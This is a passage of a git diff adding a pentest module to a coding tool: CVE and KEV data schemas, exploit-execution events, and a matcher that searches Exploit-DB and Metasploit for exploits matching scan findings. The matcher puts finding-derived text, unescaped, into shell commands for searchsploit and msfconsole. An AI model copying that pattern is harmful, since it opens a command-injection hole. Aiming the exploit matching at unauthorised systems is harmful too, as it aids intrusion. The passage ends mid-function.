+
+  /**
+   * Full CVE data structure
+   */
+  export const CVEData = z.object({
+    id: CVEId,
+    description: z.string(),
+    status: CVEStatus.optional(),
+    cvss: CVSS,
+    severity: Severity,
+    cwe: z.array(CWE).default([]),
+    references: z.array(CVEReference).default([]),
+    affected: z.array(AffectedProduct).default([]),
+    exploitability: Exploitability.optional(),
+    publishedDate: z.string(),
+    lastModifiedDate: z.string(),
+    source: APISource,
+    fetchedAt: z.number(),
+  })
+  export type CVEData = z.infer<typeof CVEData>
+
+  /**
+   * CVE lookup result
+   */
+  export const CVELookupResult = z.object({
+    status: LookupStatus,
+    cve: CVEData.optional(),
+    error: z.string().optional(),
+    source: APISource.optional(),
+    cached: z.boolean().default(false),
+    responseTime: z.number().optional(),
+  })
+  export type CVELookupResult = z.infer<typeof CVELookupResult>
+
+  /**
+   * Bulk lookup result
+   */
+  export const BulkLookupResult = z.object({
+    results: z.array(CVELookupResult),
+    stats: z.object({
+      total: z.number(),
+      found: z.number(),
+      notFound: z.number(),
+      errors: z.number(),
+      cached: z.number(),
+      duration: z.number(),
+    }),
+  })
+  export type BulkLookupResult = z.infer<typeof BulkLookupResult>
+
+  /**
+   * CVE search options
+   */
+  export const CVESearchOptions = z.object({
+    keyword: z.string().optional(),
+    cpe: z.string().optional(),
+    cwe: z.string().optional(),
+    cvssV3Severity: Severity.optional(),
+    publishedStartDate: z.string().optional(),
+    publishedEndDate: z.string().optional(),
+    modifiedStartDate: z.string().optional(),
+    modifiedEndDate: z.string().optional(),
+    hasKev: z.boolean().optional(),
+    limit: z.number().min(1).max(100).default(20),
+    offset: z.number().min(0).default(0),
+  })
+  export type CVESearchOptions = z.infer<typeof CVESearchOptions>
+
+  /**
+   * CVE search result
+   */
+  export const CVESearchResult = z.object({
+    cves: z.array(CVEData),
+    totalResults: z.number(),
+    resultsPerPage: z.number(),
+    startIndex: z.number(),
+  })
+  export type CVESearchResult = z.infer<typeof CVESearchResult>
+
+  /**
+   * KEV entry from CISA
+   */
+  export const KEVEntry = z.object({
+    cveId: CVEId,
+    vendorProject: z.string(),
+    product: z.string(),
+    vulnerabilityName: z.string(),
+    dateAdded: z.string(),
+    shortDescription: z.string(),
+    requiredAction: z.string(),
+    dueDate: z.string(),
+    knownRansomwareCampaignUse: z.enum(["Known", "Unknown"]),
+    notes: z.string().optional(),
+  })
+  export type KEVEntry = z.infer<typeof KEVEntry>
+
+  /**
+   * KEV check result
+   */
+  export const KEVCheckResult = z.object({
+    cveId: CVEId,
+    inKEV: z.boolean(),
+    entry: KEVEntry.optional(),
+  })
+  export type KEVCheckResult = z.infer<typeof KEVCheckResult>
+
+  /**
+   * CVE enrichment input (from scanner findings)
+   */
+  export const EnrichmentInput = z.object({
+    cveId: CVEId,
+    currentSeverity: Severity.optional(),
+    currentDescription: z.string().optional(),
+    source: z.string().optional(),
+  })
+  export type EnrichmentInput = z.infer<typeof EnrichmentInput>
+
+  /**
+   * CVE enrichment result
+   */
+  export const EnrichmentResult = z.object({
+    cveId: CVEId,
+    enriched: z.boolean(),
+    data: CVEData.optional(),
+    changes: z.object({
+      severityUpdated: z.boolean().default(false),
+      descriptionUpdated: z.boolean().default(false),
+      cvssAdded: z.boolean().default(false),
+      cweAdded: z.boolean().default(false),
+      exploitabilityAdded: z.boolean().default(false),
+    }),
+    error: z.string().optional(),
+  })
+  export type EnrichmentResult = z.infer<typeof EnrichmentResult>
+
+  /**
+   * Cache entry
+   */
+  export const CacheEntry = z.object({
+    cve: CVEData,
+    cachedAt: z.number(),
+    expiresAt: z.number(),
+    source: APISource,
+    hits: z.number().default(0),
+  })
+  export type CacheEntry = z.infer<typeof CacheEntry>
+
+  /**
+   * Cache statistics
+   */
+  export const CacheStats = z.object({
+    entries: z.number(),
+    hits: z.number(),
+    misses: z.number(),
+    size: z.number(),
+    oldestEntry: z.number().optional(),
+    newestEntry: z.number().optional(),
+  })
+  export type CacheStats = z.infer<typeof CacheStats>
+
+  /**
+   * API rate limit info
+   */
+  export const RateLimitInfo = z.object({
+    remaining: z.number(),
+    limit: z.number(),
+    resetAt: z.number(),
+    retryAfter: z.number().optional(),
+  })
+  export type RateLimitInfo = z.infer<typeof RateLimitInfo>
+
+  /**
+   * Tool action types
+   */
+  export const ToolAction = z.enum(["lookup", "bulk-lookup", "search", "kev-check", "enrich-findings", "cache-stats", "clear-cache"])
+  export type ToolAction = z.infer<typeof ToolAction>
+
+  /**
+   * Helper function to derive severity from CVSS score
+   */
+  export function severityFromScore(score: number): Severity {
+    if (score === 0) return "none"
+    if (score < 4.0) return "low"
+    if (score < 7.0) return "medium"
+    if (score < 9.0) return "high"
+    return "critical"
+  }
+
+  /**
+   * Helper to get the highest severity CVSS score
+   */
+  export function getHighestCVSS(cvss: CVSS): { version: string; score: number; severity: Severity } | undefined {
+    const scores: { version: string; score: number; severity: Severity }[] = []
+
+    if (cvss.v4) {
+      scores.push({ version: "4.0", score: cvss.v4.score, severity: cvss.v4.severity })
+    }
+    if (cvss.v3) {
+      scores.push({ version: cvss.v3.version, score: cvss.v3.score, severity: cvss.v3.severity })
+    }
+    if (cvss.v2) {
+      scores.push({ version: "2.0", score: cvss.v2.score, severity: severityFromScore(cvss.v2.score) })
+    }
+
+    if (scores.length === 0) return undefined
+    return scores.reduce((a, b) => (a.score > b.score ? a : b))
+  }
+}
diff --git a/packages/opencode/src/pentest/exploits/events.ts b/packages/opencode/src/pentest/exploits/events.ts
new file mode 100644
index 00000000000..4a22cbb1511
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/events.ts
@@ -0,0 +1,99 @@
+/**
+ * @fileoverview Exploit Framework Events
+ *
+ * Bus event definitions for exploit operations.
+ *
+ * @module pentest/exploits/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Exploit events namespace.
+ */
+export namespace ExploitEvents {
+  /**
+   * Exploit search completed.
+   */
+  export const SearchCompleted = BusEvent.define(
+    "pentest.exploit.search_completed",
+    z.object({
+      source: z.enum(["exploit-db", "metasploit"]),
+      query: z.string(),
+      resultCount: z.number(),
+    })
+  )
+
+  /**
+   * Exploit suggestions generated for a finding.
+   */
+  export const SuggestionsGenerated = BusEvent.define(
+    "pentest.exploit.suggestions_generated",
+    z.object({
+      findingID: z.string(),
+      matchCount: z.number(),
+    })
+  )
+
+  /**
+   * Exploit match status updated.
+   */
+  export const MatchUpdated = BusEvent.define(
+    "pentest.exploit.match_updated",
+    z.object({
+      matchID: z.string(),
+      status: z.enum(["suggested", "verified", "tested", "dismissed"]),
+    })
+  )
+
+  /**
+   * Exploit check executed.
+   */
+  export const CheckExecuted = BusEvent.define(
+    "pentest.exploit.check_executed",
+    z.object({
+      module: z.string(),
+      target: z.string(),
+      result: z.enum(["vulnerable", "not_vulnerable", "error"]),
+    })
+  )
+
+  /**
+   * Exploit execution dry run.
+   */
+  export const ExecutionDryRun = BusEvent.define(
+    "pentest.exploit.execution_dry_run",
+    z.object({
+      module: z.string(),
+      target: z.string(),
+      command: z.string(),
+    })
+  )
+
+  /**
+   * Exploit execution completed.
+   */
+  export const ExecutionCompleted = BusEvent.define(
+    "pentest.exploit.execution_completed",
+    z.object({
+      module: z.string(),
+      target: z.string(),
+      success: z.boolean(),
+      duration: z.number(),
+      sessionID: z.string().optional(),
+    })
+  )
+
+  /**
+   * Exploit execution failed.
+   */
+  export const ExecutionFailed = BusEvent.define(
+    "pentest.exploit.execution_failed",
+    z.object({
+      module: z.string(),
+      target: z.string(),
+      error: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/exploits/index.ts b/packages/opencode/src/pentest/exploits/index.ts
new file mode 100644
index 00000000000..bde4395d4bb
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/index.ts
@@ -0,0 +1,28 @@
+/**
+ * @fileoverview Exploit Framework Integration
+ *
+ * Provides exploit search, suggestion, and execution capabilities for
+ * the cyxwiz pentest module.
+ *
+ * Features:
+ * - Searchsploit/Exploit-DB integration
+ * - Metasploit Framework integration
+ * - Automatic exploit matching to findings
+ * - Safe execution with mandatory confirmation
+ *
+ * @module pentest/exploits
+ */
+
+// Types
+export { ExploitTypes } from "./types"
+
+// Events
+export { ExploitEvents } from "./events"
+
+// Core functionality
+export { ExploitTool } from "./tool"
+export { ExploitMatcher } from "./matcher"
+export { ExploitStorage, type StorageConfig } from "./storage"
+
+// Parsers
+export { SearchsploitParser, MetasploitParser } from "./parsers"
diff --git a/packages/opencode/src/pentest/exploits/matcher.ts b/packages/opencode/src/pentest/exploits/matcher.ts
new file mode 100644
index 00000000000..86cb986dfac
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/matcher.ts
@@ -0,0 +1,378 @@
+/**
+ * @fileoverview Exploit Matcher Service
+ *
+ * Matches findings to potential exploits by:
+ * - CVE correlation
+ * - Service/version matching
+ * - Product name matching
+ *
+ * @module pentest/exploits/matcher
+ */
+
+import { spawn } from "child_process"
+import { randomBytes } from "crypto"
+import { ExploitTypes } from "./types"
+import { PentestTypes } from "../types"
+import { SearchsploitParser } from "./parsers/searchsploit"
+import { MetasploitParser } from "./parsers/metasploit"
+import { Log } from "../../util/log"
+import { Instance } from "../../project/instance"
+
+const log = Log.create({ service: "pentest.exploits.matcher" })
+
+export namespace ExploitMatcher {
+  /**
+   * Match options.
+   */
+  export interface MatchOptions {
+    /** Search searchsploit/exploit-db */
+    searchsploit?: boolean
+    /** Search metasploit */
+    metasploit?: boolean
+    /** Limit results per source */
+    limit?: number
+    /** Timeout in milliseconds */
+    timeout?: number
+  }
+
+  const DEFAULT_OPTIONS: MatchOptions = {
+    searchsploit: true,
+    metasploit: true,
+    limit: 10,
+    timeout: 30000,
+  }
+
+  /**
+   * Generate unique match ID.
+   */
+  function generateMatchId(): string {
+    const timestamp = Date.now().toString(36)
+    const random = randomBytes(6).toString("hex")
+    return `match_${timestamp}_${random}`
+  }
+
+  /**
+   * Find exploits matching a finding.
+   *
+   * @param finding - Finding to match
+   * @param options - Match options
+   * @returns Array of exploit matches
+   */
+  export async function matchFinding(
+    finding: PentestTypes.Finding,
+    options: MatchOptions = {}
+  ): Promise<ExploitTypes.ExploitMatch[]> {
+    const opts = { ...DEFAULT_OPTIONS, ...options }
+    const matches: ExploitTypes.ExploitMatch[] = []
+
+    // Build search queries based on finding
+    const queries = buildQueries(finding)
+
+    log.info("Matching finding to exploits", {
+      findingID: finding.id,
+      queries,
+      options: opts,
+    })
+
+    // Search by CVE first (highest confidence)
+    if (finding.cve?.length) {
+      for (const cve of finding.cve) {
+        if (opts.searchsploit) {
+          const ssMatches = await searchSearchsploit(
+            cve,
+            finding.id,
+            "CVE match",
+            "high",
+            opts
+          )
+          matches.push(...ssMatches)
+        }
+        if (opts.metasploit) {
+          const msfMatches = await searchMetasploit(
+            cve,
+            finding.id,
+            "CVE match",
+            "high",
+            opts
+          )
+          matches.push(...msfMatches)
+        }
+      }
+    }
+
+    // Search by service/version
+    for (const query of queries) {
+      if (opts.searchsploit && matches.length < (opts.limit || 10)) {
+        const ssMatches = await searchSearchsploit(
+          query,
+          finding.id,
+          `Service/version match: ${query}`,
+          "medium",
+          opts
+        )
+        matches.push(...ssMatches)
+      }
+      if (opts.metasploit && matches.length < (opts.limit || 10)) {
+        const msfMatches = await searchMetasploit(
+          query,
+          finding.id,
+          `Service/version match: ${query}`,
+          "medium",
+          opts
+        )
+        matches.push(...msfMatches)
+      }
+    }
+
+    // Deduplicate by exploitID
+    const seen = new Set<string>()
+    const deduplicated = matches.filter((m) => {
+      const key = `${m.source}:${m.exploitID}`
+      if (seen.has(key)) return false
+      seen.add(key)
+      return true
+    })
+
+    // Apply limit
+    const limited = deduplicated.slice(0, opts.limit)
+
+    log.info("Exploit matching complete", {
+      findingID: finding.id,
+      totalMatches: matches.length,
+      deduplicated: deduplicated.length,
+      returned: limited.length,
+    })
+
+    return limited
+  }
+
+  /**
+   * Build search queries from finding data.
+   */
+  export function buildQueries(finding: PentestTypes.Finding): string[] {
+    const queries: string[] = []
+
+    // Service name + version
+    if (finding.service) {
+      queries.push(finding.service)
+
+      // Extract version from evidence if available
+      const versionMatch = finding.evidence?.match(/version[:\s]+([0-9.]+)/i)
+      if (versionMatch) {
+        queries.push(`${finding.service} ${versionMatch[1]}`)
+      }
+    }
+
+    // Port-based service names
+    if (finding.port) {
+      const portServices: Record<number, string[]> = {
+        21: ["ftp", "vsftpd", "proftpd"],
+        22: ["ssh", "openssh"],
+        23: ["telnet"],
+        25: ["smtp", "postfix", "sendmail"],
+        80: ["http", "apache", "nginx", "iis"],
+        443: ["https", "ssl"],
+        445: ["smb", "samba"],
+        1433: ["mssql", "sql server"],
+        3306: ["mysql", "mariadb"],
+        3389: ["rdp", "remote desktop"],
+        5432: ["postgresql", "postgres"],
+        6379: ["redis"],
+        27017: ["mongodb"],
+      }
+
+      const portServiceNames = portServices[finding.port]
+      if (portServiceNames) {
+        queries.push(
+          ...portServiceNames.filter((s) => s !== finding.service?.toLowerCase())
+        )
+      }
+    }
+
+    // From title keywords
+    const titleWords = finding.title
+      .toLowerCase()
+      .replace(/[^\w\s]/g, " ")
+      .split(/\s+/)
+      .filter((w) => w.length > 3)
+      .filter(
+        (w) =>
+          !["exposed", "service", "found", "detected", "port", "open"].includes(
+            w
+          )
+      )
+
+    if (titleWords.length > 0) {
+      queries.push(titleWords.slice(0, 3).join(" "))
+    }
+
+    return [...new Set(queries)]
+  }
+
+  /**
+   * Search searchsploit.
+   */
+  async function searchSearchsploit(
+    query: string,
+    findingID: string,
+    matchReason: string,
+    confidence: ExploitTypes.Confidence,
+    options: MatchOptions
+  ): Promise<ExploitTypes.ExploitMatch[]> {
+    try {
+      const output = await runCommand(
+        `searchsploit -j "${query}"`,
+        options.timeout || 30000
+      )
+
+      const result = SearchsploitParser.parse(output, query)
+      const matchData = SearchsploitParser.toMatches(
+        result,
+        findingID,
+        matchReason,
+        confidence
+      )
+
+      // Add IDs and timestamps
+      return matchData.slice(0, options.limit).map((m) => ({
+        ...m,
+        id: generateMatchId(),
+        createdAt: Date.now(),
+      }))
+    } catch (err) {
+      log.warn("Searchsploit search failed", { query, error: err })
+      return []
+    }
+  }
+
+  /**
+   * Search metasploit.
+   */
+  async function searchMetasploit(
+    query: string,
+    findingID: string,
+    matchReason: string,
+    confidence: ExploitTypes.Confidence,
+    options: MatchOptions
+  ): Promise<ExploitTypes.ExploitMatch[]> {
+    try {
+      // Use msfconsole with resource script for non-interactive search
+      const output = await runCommand(
+        `msfconsole -q -x "search ${query}; exit"`,
+        options.timeout ? options.timeout * 2 : 60000
+      )
+
+      const result = MetasploitParser.parseSearch(output, query)
+      const matchData = MetasploitParser.toMatches(
+        result,
+        findingID,
+        matchReason,
+        confidence
+      )
+
+      return matchData.slice(0, options.limit).map((m) => ({
+        ...m,
+        id: generateMatchId(),
+        createdAt: Date.now(),
+      }))
+    } catch (err) {
+      log.warn("Metasploit search failed", { query, error: err })
+      return []
+    }
+  }
+
+  /**
+   * Run command and capture output.
+   */
+  async function runCommand(command: string, timeout: number): Promise<string> {
+    return new Promise((resolve, reject) => {
+      let stdout = ""
+      let stderr = ""
+
+      const proc = spawn(command, {
+        shell: true,
+        cwd: Instance.directory,
+        stdio: ["ignore", "pipe", "pipe"],
+      })
+
+      proc.stdout?.on("data", (chunk: Buffer) => {
+        stdout += chunk.toString()
+      })
+
+      proc.stderr?.on("data", (chunk: Buffer) => {
+        stderr += chunk.toString()
+      })
+
+      const timer = setTimeout(() => {
+        proc.kill("SIGTERM")
+        reject(new Error(`Command timed out after ${timeout}ms`))
+      }, timeout)
+
+      proc.once("exit", (code) => {
+        clearTimeout(timer)
+        if (code === 0 || stdout.length > 0) {
+          resolve(stdout)
+        } else {
+          reject(new Error(stderr || `Command failed with code ${code}`))
+        }
+      })
+
+      proc.once("error", (err) => {
+        clearTimeout(timer)
+        reject(err)
+      })
+    })
+  }
+
+  /**
+   * Suggest exploits for multiple findings.
+   */
+  export async function suggestForFindings(
+    findings: PentestTypes.Finding[],
+    options: MatchOptions = {}
+  ): Promise<Map<string, ExploitTypes.ExploitMatch[]>> {
+    const results = new Map<string, ExploitTypes.ExploitMatch[]>()
+
+    for (const finding of findings) {
+      const matches = await matchFinding(finding, options)
+      if (matches.length > 0) {
+        results.set(finding.id, matches)
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Rank exploits by applicability and reliability.
+   */
+  export function rankMatches(
+    matches: ExploitTypes.ExploitMatch[]
+  ): ExploitTypes.ExploitMatch[] {
+    return [...matches].sort((a, b) => {
+      // Confidence first
+      const confOrder = { high: 3, medium: 2, low: 1 }
+      const confDiff = confOrder[b.confidence] - confOrder[a.confidence]
+      if (confDiff !== 0) return confDiff
+
+      // Then by rank (MSF modules)
+      const rankOrder: Record<string, number> = {
+        excellent: 6,
+        great: 5,
+        good: 4,
+        normal: 3,
+        average: 2,
+        low: 1,
+        manual: 0,
+      }
+      const aRank = a.rank ? rankOrder[a.rank] || 0 : 3
+      const bRank = b.rank ? rankOrder[b.rank] || 0 : 3
+      if (bRank !== aRank) return bRank - aRank
+
+      // Prefer CVE matches
+      const aCve = a.cve?.length || 0
+      const bCve = b.cve?.length || 0
+      return bCve - aCve
+    })
+  }
+}
diff --git a/packages/opencode/src/pentest/exploits/parsers/index.ts b/packages/opencode/src/pentest/exploits/parsers/index.ts
new file mode 100644
index 00000000000..115a7ff4f74
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/parsers/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @fileoverview Exploit Parsers
+ *
+ * Parser modules for exploit tool outputs.
+ *
+ * @module pentest/exploits/parsers
+ */
+
+export { SearchsploitParser } from "./searchsploit"
+export { MetasploitParser } from "./metasploit"
diff --git a/packages/opencode/src/pentest/exploits/parsers/metasploit.ts b/packages/opencode/src/pentest/exploits/parsers/metasploit.ts
new file mode 100644
index 00000000000..273c397e8bf
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/parsers/metasploit.ts
@@ -0,0 +1,316 @@
+/**
+ * @fileoverview Metasploit Output Parser
+ *
+ * Parses msfconsole search and module info output.
+ *
+ * @module pentest/exploits/parsers/metasploit
+ */
+
+import { ExploitTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "pentest.parser.metasploit" })
+
+export namespace MetasploitParser {
+  /**
+   * Parse msfconsole search output.
+   *
+   * @param output - Raw msfconsole search output
+   * @param query - Search query used
+   * @returns Parsed metasploit search result
+   */
+  export function parseSearch(
+    output: string,
+    query: string
+  ): ExploitTypes.MetasploitSearchResult {
+    const modules: ExploitTypes.MetasploitModule[] = []
+    const lines = output.split("\n")
+
+    // Skip header and separator lines
+    let dataSection = false
+    for (const line of lines) {
+      // Detect data section start
+      if (
+        line.includes("Name") &&
+        (line.includes("Disclosure Date") || line.includes("Rank"))
+      ) {
+        dataSection = true
+        continue
+      }
+      if (line.match(/^[\s-]+$/)) continue
+      if (!dataSection) continue
+      if (!line.trim()) continue
+
+      // Parse module line
+      const module = parseSearchLine(line)
+      if (module) {
+        modules.push(module)
+      }
+    }
+
+    return {
+      query,
+      modules,
+      timestamp: Date.now(),
+    }
+  }
+
+  /**
+   * Parse a single search result line.
+   */
+  function parseSearchLine(line: string): ExploitTypes.MetasploitModule | null {
+    try {
+      // Split by multiple spaces (columns are space-padded)
+      const parts = line.trim().split(/\s{2,}/)
+      if (parts.length < 2) return null
+
+      // Handle format: [#]  Name  Date  Rank  Check  Description
+      let idx = 0
+
+      // Skip index number if present
+      if (parts[0].match(/^\d+$/)) idx++
+
+      const name = parts[idx]
+      if (!name || !name.includes("/")) return null
+
+      const type = mapModuleType(name)
+      const disclosureDate = parts[idx + 1]?.match(/\d{4}-\d{2}-\d{2}/)
+        ? parts[idx + 1]
+        : undefined
+      const rank = mapRank(parts[idx + (disclosureDate ? 2 : 1)])
+      const check = parts.some((p) => p.toLowerCase() === "yes")
+      const description = parts.slice(-1)[0]
+
+      // Extract CVEs from name or description
+      const cves: string[] = []
+      const cveMatch = (name + " " + description).match(/CVE-\d{4}-\d+/gi)
+      if (cveMatch) cves.push(...cveMatch)
+
+      return {
+        name,
+        type,
+        rank,
+        disclosure_date: disclosureDate,
+        description: description !== name ? description : undefined,
+        cve: cves.length > 0 ? [...new Set(cves)] : undefined,
+        check,
+      }
+    } catch (err) {
+      log.warn("Failed to parse MSF search line", { line, error: err })
+      return null
+    }
+  }
+
+  /**
+   * Parse msfconsole module info output.
+   */
+  export function parseModuleInfo(
+    output: string
+  ): Partial<ExploitTypes.MetasploitModule> {
+    const info: Partial<ExploitTypes.MetasploitModule> = {}
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const colonIdx = line.indexOf(":")
+      if (colonIdx === -1) continue
+
+      const key = line.slice(0, colonIdx).trim().toLowerCase()
+      const value = line.slice(colonIdx + 1).trim()
+
+      switch (key) {
+        case "name":
+          info.fullname = value
+          break
+        case "module":
+          info.name = value
+          break
+        case "rank":
+          info.rank = mapRank(value)
+          break
+        case "disclosure date":
+          info.disclosure_date = value
+          break
+        case "description":
+          info.description = value
+          break
+        case "author":
+          info.author = value.split(",").map((a) => a.trim())
+          break
+        case "check supported":
+          info.check = value.toLowerCase() === "yes"
+          break
+        case "privileged":
+          info.privileged = value.toLowerCase() === "true"
+          break
+      }
+    }
+
+    // Extract references section
+    const refsMatch = output.match(/References:(.+?)(?:Available|Basic|$)/s)
+    if (refsMatch) {
+      const refs = refsMatch[1].match(/https?:\/\/[^\s]+|CVE-\d+-\d+/g)
+      if (refs) {
+        info.references = refs
+        info.cve = refs
+          .filter((r) => r.startsWith("CVE-"))
+          .map((r) => r.toUpperCase())
+      }
+    }
+
+    // Extract options
+    const optionsMatch = output.match(/Options:(.+?)(?:Description|Payload|$)/s)
+    if (optionsMatch) {
+      info.options = parseOptions(optionsMatch[1])
+    }
+
+    return info
+  }
+
+  /**
+   * Parse module options section.
+   */
+  function parseOptions(
+    optionsText: string
+  ): ExploitTypes.MetasploitModule["options"] {
+    const options: NonNullable<ExploitTypes.MetasploitModule["options"]> = []
+    const lines = optionsText.split("\n")
+
+    for (const line of lines) {
+      // Format: Name  Current Setting  Required  Description
+      const parts = line.trim().split(/\s{2,}/)
+      if (parts.length < 3) continue
+      if (parts[0].match(/^-+$/) || parts[0] === "Name") continue
+
+      options.push({
+        name: parts[0],
+        required: parts[2]?.toLowerCase() === "yes",
+        default: parts[1] || undefined,
+        description: parts[3],
+      })
+    }
+
+    return options.length > 0 ? options : undefined
+  }
+
+  /**
+   * Map module path to type.
+   */
+  function mapModuleType(name: string): ExploitTypes.ExploitType {
+    if (name.startsWith("exploit/")) return "remote"
+    if (name.startsWith("auxiliary/")) return "auxiliary"
+    if (name.startsWith("post/")) return "post"
+    if (name.startsWith("payload/")) return "shellcode"
+    if (name.startsWith("encoder/")) return "encoder"
+    if (name.startsWith("nop/")) return "nop"
+    if (name.includes("/local/")) return "local"
+    if (name.includes("/dos/")) return "dos"
+    return "remote"
+  }
+
+  /**
+   * Map rank string to enum.
+   */
+  function mapRank(rank?: string): ExploitTypes.ExploitRank | undefined {
+    if (!rank) return undefined
+    const lower = rank.toLowerCase()
+    if (lower.includes("excellent")) return "excellent"
+    if (lower.includes("great")) return "great"
+    if (lower.includes("good")) return "good"
+    if (lower.includes("normal")) return "normal"
+    if (lower.includes("average")) return "average"
+    if (lower.includes("low")) return "low"
+    if (lower.includes("manual")) return "manual"
+    return "normal"
+  }
+
+  /**
+   * Format search results as human-readable text.
+   */
+  export function format(result: ExploitTypes.MetasploitSearchResult): string {
+    const lines: string[] = []
+
+    lines.push(`Metasploit Search Results for: "${result.query}"`)
+    lines.push("=".repeat(60))
+    lines.push("")
+
+    if (result.modules.length === 0) {
+      lines.push("No modules found.")
+      return lines.join("\n")
+    }
+
+    lines.push(`MODULES (${result.modules.length})`)
+    lines.push("-".repeat(60))
+
+    // Group by type
+    const byType = new Map<string, ExploitTypes.MetasploitModule[]>()
+    for (const m of result.modules) {
+      const type = m.type || "other"
+      if (!byType.has(type)) byType.set(type, [])
+      byType.get(type)!.push(m)
+    }
+
+    for (const [type, modules] of byType) {
+      lines.push("")
+      lines.push(`${type.toUpperCase()} (${modules.length})`)
+      for (const m of modules) {
+        const rankStr = m.rank ? `[${m.rank}]` : ""
+        const checkStr = m.check ? "[check]" : ""
+        lines.push(`  ${m.name} ${rankStr} ${checkStr}`)
+        if (m.description) {
+          lines.push(
+            `    ${m.description.slice(0, 80)}${m.description.length > 80 ? "..." : ""}`
+          )
+        }
+        if (m.cve?.length) {
+          lines.push(`    CVE: ${m.cve.join(", ")}`)
+        }
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize results.
+   */
+  export function summarize(result: ExploitTypes.MetasploitSearchResult): string {
+    const byType = new Map<string, number>()
+    for (const m of result.modules) {
+      const t = m.type || "other"
+      byType.set(t, (byType.get(t) || 0) + 1)
+    }
+
+    const parts = [`Found ${result.modules.length} MSF module(s)`]
+    for (const [type, count] of byType) {
+      parts.push(`${count} ${type}`)
+    }
+    return parts.join(", ")
+  }
+
+  /**
+   * Convert MSF search results to exploit matches.
+   */
+  export function toMatches(
+    result: ExploitTypes.MetasploitSearchResult,
+    findingID: string,
+    matchReason: string,
+    confidence: ExploitTypes.Confidence = "medium"
+  ): Array<Omit<ExploitTypes.ExploitMatch, "id" | "createdAt">> {
+    return result.modules.map((module) => ({
+      findingID,
+      source: "metasploit" as const,
+      exploitID: module.name,
+      title: module.fullname || module.name,
+      description: module.description,
+      type: module.type,
+      rank: module.rank,
+      confidence,
+      matchReason,
+      cve: module.cve,
+      requiresAuth: module.options?.some(
+        (o) => o.name.includes("USER") && o.required
+      ),
+      status: "suggested" as const,
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/exploits/parsers/searchsploit.ts b/packages/opencode/src/pentest/exploits/parsers/searchsploit.ts
new file mode 100644
index 00000000000..9b7f7a8fd24
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/parsers/searchsploit.ts
@@ -0,0 +1,277 @@
+/**
+ * @fileoverview Searchsploit Output Parser
+ *
+ * Parses searchsploit output in JSON and text formats.
+ * Supports JSON output via -j flag.
+ *
+ * @module pentest/exploits/parsers/searchsploit
+ */
+
+import { ExploitTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "pentest.parser.searchsploit" })
+
+export namespace SearchsploitParser {
+  /**
+   * Parse searchsploit output (JSON preferred via -j flag).
+   *
+   * @param output - Raw searchsploit output
+   * @param query - Search query used
+   * @returns Parsed searchsploit result
+   */
+  export function parse(output: string, query: string): ExploitTypes.SearchsploitResult {
+    // Try JSON parsing first (from -j flag)
+    try {
+      const json = JSON.parse(output)
+      return parseJson(json, query)
+    } catch {
+      // Fall back to text parsing
+      return parseText(output, query)
+    }
+  }
+
+  /**
+   * Parse JSON output from searchsploit -j.
+   */
+  function parseJson(json: any, query: string): ExploitTypes.SearchsploitResult {
+    const exploits: ExploitTypes.SearchsploitEntry[] = []
+    const shellcodes: ExploitTypes.SearchsploitEntry[] = []
+    const papers: ExploitTypes.SearchsploitEntry[] = []
+
+    // Handle different JSON formats
+    const exploitResults = json.RESULTS_EXPLOIT || json.results_exploit || []
+    const shellcodeResults = json.RESULTS_SHELLCODE || json.results_shellcode || []
+
+    for (const entry of exploitResults) {
+      const parsed = parseEntry(entry)
+      if (parsed) exploits.push(parsed)
+    }
+
+    for (const entry of shellcodeResults) {
+      const parsed = parseEntry(entry)
+      if (parsed) shellcodes.push(parsed)
+    }
+
+    return {
+      query,
+      exploits,
+      shellcodes: shellcodes.length > 0 ? shellcodes : undefined,
+      papers: papers.length > 0 ? papers : undefined,
+      timestamp: Date.now(),
+    }
+  }
+
+  /**
+   * Parse a single entry from JSON.
+   */
+  function parseEntry(entry: any): ExploitTypes.SearchsploitEntry | null {
+    try {
+      const id =
+        entry["EDB-ID"]?.toString() ||
+        entry.id?.toString() ||
+        extractIdFromPath(entry.Path || entry.path)
+
+      if (!id) return null
+
+      // Extract CVEs from codes or title
+      const cves: string[] = []
+      if (entry.Codes) {
+        const codeMatch = entry.Codes.match(/CVE-\d{4}-\d+/gi)
+        if (codeMatch) cves.push(...codeMatch)
+      }
+      const titleCves = (entry.Title || "").match(/CVE-\d{4}-\d+/gi)
+      if (titleCves) cves.push(...titleCves)
+
+      return {
+        id,
+        title: entry.Title || entry.title || "Unknown",
+        path: entry.Path || entry.path || "",
+        date: entry.Date || entry.date,
+        author: entry.Author || entry.author,
+        type: mapExploitType(entry.Type || entry.type),
+        platform: mapPlatform(entry.Platform || entry.platform),
+        port: entry.Port ? parseInt(entry.Port, 10) : undefined,
+        cve: cves.length > 0 ? [...new Set(cves)] : undefined,
+        verified: entry.Verified === "1" || entry.verified === true,
+        codes: entry.Codes
+          ? {
+              cve: cves.length > 0 ? cves : undefined,
+              edb: id,
+            }
+          : undefined,
+      }
+    } catch (err) {
+      log.warn("Failed to parse searchsploit entry", { error: err })
+      return null
+    }
+  }
+
+  /**
+   * Parse text output (fallback).
+   */
+  function parseText(output: string, query: string): ExploitTypes.SearchsploitResult {
+    const exploits: ExploitTypes.SearchsploitEntry[] = []
+    const lines = output.split("\n")
+
+    // Skip header lines
+    let dataStarted = false
+    for (const line of lines) {
+      if (line.includes("-----")) {
+        dataStarted = true
+        continue
+      }
+      if (!dataStarted) continue
+      if (!line.trim()) continue
+
+      // Parse pipe-delimited format: Title | Path
+      const parts = line.split("|").map((p) => p.trim())
+      if (parts.length >= 2) {
+        const title = parts[0]
+        const path = parts[parts.length - 1]
+        const id = extractIdFromPath(path)
+
+        if (id && title) {
